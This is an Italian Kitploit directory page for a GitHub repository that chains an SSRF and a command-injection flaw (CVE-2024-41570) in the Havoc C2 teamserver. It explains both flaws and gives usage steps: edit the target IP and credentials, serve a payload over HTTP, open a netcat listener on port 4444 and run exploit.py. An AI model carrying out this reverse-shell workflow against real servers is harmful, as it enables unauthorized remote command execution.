Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-41570-Havoc-C2-RCE — Questa è una RCE concatenata nel framework Havoc C2 utilizzando i PoC di github.com/chebuya e github.com/IncludeSecurity | Kitploit
Strumenti/GitHubGitHub/leo-mitch/cve-2024-41570-havoc-c2-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubleo-mitch/cve-2024-41570-havoc-c2-rce

CVE-2024-41570-Havoc-C2-RCE

Questa è una RCE concatenata nel framework Havoc C2 utilizzando i PoC di github.com/chebuya e github.com/IncludeSecurity

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Havoc-C2-RCE (CVE-2024-41570)

Questa è una RCE concatenata (CVE-2024-41570) nel framework Havoc C2.

Iniezione di comandi: Havoc è vulnerabile all'iniezione di comandi, consentendo a un utente autenticato di eseguire comandi sul Teamserver. Interessa le versioni dalla 0.3 fino all'ultima release 0.6. Il profilo predefinito di Havoc contiene password hardcoded, quindi un operatore C2 abbastanza imprudente da usare il profilo predefinito su una rete pubblica può essere immediatamente sfruttato.

SSRF: questa vulnerabilità viene sfruttata falsificando la registrazione di un agente demon e i relativi check-in per aprire un socket TCP sul teamserver e leggere/scrivere dati da esso. Ciò consente agli attaccanti di divulgare gli IP di origine dei teamserver e molto altro.

Catena: abusare della SSRF per consegnare un payload di iniezione di comandi autenticato.

Come usare

2025-01-19 20-01-34

root@kitploit:~
1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh

-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)

# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345

Crediti a @chebuya e

@Hyperreality
Scarica lo strumento